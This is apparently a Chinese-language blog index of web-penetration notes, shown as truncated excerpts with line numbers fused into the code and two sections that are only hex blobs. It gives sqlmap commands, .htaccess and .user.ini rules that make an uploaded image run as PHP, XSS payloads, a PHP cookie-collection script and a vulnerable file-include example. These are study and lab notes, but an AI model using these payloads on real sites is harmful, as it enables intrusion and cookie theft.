sqlmap使用
E:\att_tools\web_tools\sql injection\sqlmap
基本使用探测指定url是否存在SQL注入
无需登录
1sqlmap -u "url" #探测该url是否存在漏洞
需要登录
cookie
1sqlmap -u "url" --cookie="抓取的cookie" #探测该url是否存在漏洞
data参数
1sqlmap -u "url" --data="uname=admin&passwd=admin&submit=Submit" #抓取其post提交的数据填入
探测http数据包
12345678910111213POST /sqli/Less-11/ HTTP/1.1Host: 192.168.10.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0Accept: text/html,app ...
端口服务对应的漏洞利用
c157c9744e0298d00173c08a9dbffe0ec94f198c43dd2b95a3c3b526c19ab930519492f14cc6018f3210debd10f16b921deeae270bc2eca138438d835e387d025e359d30f89baf0243c68b3d47b72c848dac2ed67f0ae43e9beb88bcf43d260965456366c9455964c1985c62f8dc1175974e37f248acb2827edcf7adc6ec94e28fe87b30903571ecc5eb4f4608e886e8837bb808101d599dfa4af64f250a4e513ec943f24b2b1ccfbe1467699178401a7c326e0d4e15d8144641c98950a7f2a0ef1db9d5c9b1da3f7c53537d902e524290e2a36f58428d44468b251e3e9f775c421a5b11c732304c94814c808450a9c1ca7d8cfa8e9e99184 ...
PowerShell
c157c9744e0298d00173c08a9dbffe0ec94f198c43dd2b95a3c3b526c19ab930c03078228bbd303dca30847a0ca0c039c77845022f51e26dce8ce93fded9a9adff11e4cbfdbc8d684a155df13731396645471ec02486fb47624b505858675131eabaa0de2f173b62d0e6e36e671f7f2d8d194652c095ddb8c1ab0f52819a9d6feccdb02a7756d2c1b070046cec9803fde929ae47bda9ec407bc7eb3af4ae69c61e16708a4694787dbfa0703f87c22e91efffe4f0a350746f264eacb0d4375874456a4af53baad256a67b138fa34ed169ea97331d670aff63ba32de9bd4a028d4558914ebdc458f46917fb268ce954d2d042134ba975221f2a ...
文件上传漏洞
文件上传漏洞判断流程
绕过方式:客户端js检测绕过攻击
抓包修改后缀
更改客户端js
文件类型绕过Content-Type类型改为:image/jpeg
后缀绕过.htaccess黑名单无过滤.htaccess上传.htaccess内容为:
12345678#能够解析.php .phtml .phps .php5 .phtAddType application/x-httpd-php .php .phtml .phps .php5 .pht#就是在upload目录下匹配shell.jpg的文件并以php文件执行<FilesMatch "shell.jpg">SetHandler application/x-httpd-php</FilesMatch>#全部解析SetHandler application/x-httpd-php
.user.ini借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell
1auto_prepend_file=1.png
...
XSS
XSS危害
网络钓鱼
盗取用户cookies信息,劫持会话,用户浏览器
强制弹出广告页面、刷流量
网页挂马
任意篡改页面信息
获取客户端隐私信息
控制受害者机器向其他网站发起攻击
结合其他漏洞,如CSRF漏洞
提升用户权限,内网扫描
传播跨站脚本蠕虫等
常用语句123456<script>alert(/xss/);</script> //经典语句'-prompt(1)-'<BODY ONLOAD=alert('XSS')><img src=x onerror=alert(1)><svg onload=alert(1)><a href = javasript:alert(1)>
获取cookie服务端
12345678<?php$content = $_GET[1];if(isset($content)){ file_put_contents('flag.txt',$content);}else{ ...
文件包含漏洞
PHP文件包含漏洞php文件包含函数1234include() # 如果出错的话,只会提出警告,会继续执行后续语句 include_once()require() # 如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句require_once() # _once()一个文件已经被包含过了,则不会再包含它,以避免函数重定义或变量重赋值等问题。
示例代码
1234567<?if(isset($_GET['file'])){ $file = $_GET['file']; include($file);}else{ highlight_file(__FILE__);}
LFI本地文件包含RFI远程文件包含相较于LFI本地文件包含漏洞其被包含的文件源不从磁盘上获取
php.ini中需要配置
12allow_url_fopen = Onallow_url_include = On
allow_url_fopen默认一直是On,而allow_url_include从p ...